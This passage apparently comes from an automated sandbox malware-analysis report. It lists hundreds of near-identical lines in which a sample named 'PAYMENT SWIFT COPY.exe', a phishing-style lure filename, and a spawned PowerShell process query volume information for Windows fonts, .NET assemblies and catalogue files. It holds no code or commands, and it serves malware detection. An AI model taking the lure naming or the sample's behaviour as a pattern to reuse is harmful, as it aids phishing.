                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
